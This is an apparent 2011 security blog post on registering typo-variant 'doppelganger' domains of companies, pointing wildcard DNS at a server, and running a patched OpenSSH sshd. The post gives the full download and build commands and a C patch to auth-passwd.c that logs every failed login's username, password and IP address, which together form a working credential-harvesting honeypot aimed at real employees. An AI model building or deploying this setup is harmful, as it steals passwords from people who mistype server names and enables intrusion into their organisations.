Archive for December, 2011

 

Doppelganging Your SSH Server

Dec 16, 2011 in Security

The Doppelganger Project

You might remember my last big research project about Typosquatting http://www.wired.com/threatlevel/2011/09/doppelganger-domains/ a very specific type of Doppelganger attack. To recap, lets say your company has an email structure similar to this:

john.smith@us.company.com
john.smith@asia.company.com
john.smith@eu.company.com

What I first do is figure out all the different sub-domains a company might have. I have seen the sub-domains use countries, country codes, departments, cities, and etc. The next step is to verify that these email sub-domains are actually used. Do a couple Google searches and you can easily see how popular those email sub-domains are. After that, I find if the doppelganger domains are available. For example, in this case, these would be the doppleganger domains you might want to purchase:

uscompany.com
asiacompany.com
eucompany.com

Once you find the appropriate doppelgangers, purchase those domains, setup an email servers, enable catchall, and watch misaddressed emails come in. So that was what was from our previous research project and that was extremely successful. I hope if you are a company that has doppelganger domains, that you have purchased them all.

Tracking SSH Attempts

Now I decided to take this one step further. What if I setup an ssh server on those doppelganger domains and monitor attempts? If someone who works for one of those companies tries to SSH to one of their servers, but mistypes it, we might be able to gain their credentials.

First, we would have to set the DNS A record to point all records to a particular IP. For example, I set the A record host to “*” and pointed the host record to my IP address. Any subdomain within the doppelganger will point back to my server. Meaning:

test.uscompany.com
arp.uscomany.com
deadbeef.uscompany.com

All point back to a single IP. Now we need to setup an SSH server that logs both the username and password. For this I have configured a server running Ubuntu 11.10. Since normal sshd won’t record the passwords, we are going to have to modify a version of sshd. I started off by downloading openssh portable 5.9p1, which is the current release.

wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

To Extract:
tar xvfz openssh-5.9p1.tar.gz

Go into the openssh directory:
cd openssh-5.9p1

We need to modify the auth-passwd.c file before me compile sshd. Here is what I changed below, but I have also included the whole auth-passwd.c file you should replace [https://www.securepla.net/download/auth-passwd.c]:

if(!sys_auth_passwd(authctxt, password))
{
FILE *garp;
garp = fopen("/var/log/sshd_logged", "a");
chmod("/var/log/sshd_logged", 0600);
fprintf(garp,"%s:%s:%s\n",authctxt->user,password,get_remote_ipaddr());
fclose(garp);
}
return (result && ok);

What I did here is when we have an invalid login, write down the username, password, and ip address into a file located in /var/log/sshd_logged.
After replacing the auth-passwd.c file, lets compile and make it:
sudo ./configure --prefix=/opt --sysconfdir=/etc/ssh
make
sudo make install

Now we should have a working version of our new sshd service. To start sshd:
sudo /opt/sbin/sshd

Now you can just run the command:
tail -f /var/log/sshd_logged

ssh_log

And watch the usernames/passwords fly by.

Now some things to help you out.
1) Don’t forget to do some type of port forwarding on your external router if you are NAT’ed.
2) Enable Fail2ban. Unless you want SSH bruteforcers trying passwords all day enable fail2ban. Once a single IP hits too many bad ssh logins in a row, it will temporarily ban that IP. This will help you get rid of false positives
3) I am not a lawyer and this was just for educational purposes. Please check with your lawyer or contact someone like the EFF to see what you can and can’t do.